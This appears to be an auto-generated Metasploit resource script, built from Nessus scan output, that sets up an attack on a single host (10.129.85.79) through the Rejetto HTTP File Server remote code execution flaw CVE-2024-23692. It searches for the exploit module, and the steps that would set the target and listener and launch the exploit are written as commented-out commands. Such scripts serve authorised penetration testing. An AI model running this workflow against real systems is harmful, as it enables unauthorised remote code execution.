# Metasploit Resource Script for Exploit Framework Vulnerabilities
# Generated from Nessus raw scan data
# Total vulnerabilities with Metasploit exploits: 1
# Target hosts: 10.129.85.79
# Associated CVEs: 

# Set global options
setg VERBOSE true

# CRITICAL - Rejetto HTTP File Server 2.x <= 2.3m RCE (CVE-2024-23692)
# Host: 10.129.85.79 | Plugin ID: 206652
# CVSS Score: 10.0

# Specific Metasploit Exploit: Rejetto HTTP File Server (HFS) Unauthenticated Remote Code Execution
search Rejetto HTTP File

search Rejetto HTTP File
# Review search results and select appropriate module
# search type:exploit
# use <module_path>
# set RHOSTS 10.129.85.79
# set LHOST <your_ip>
# exploit
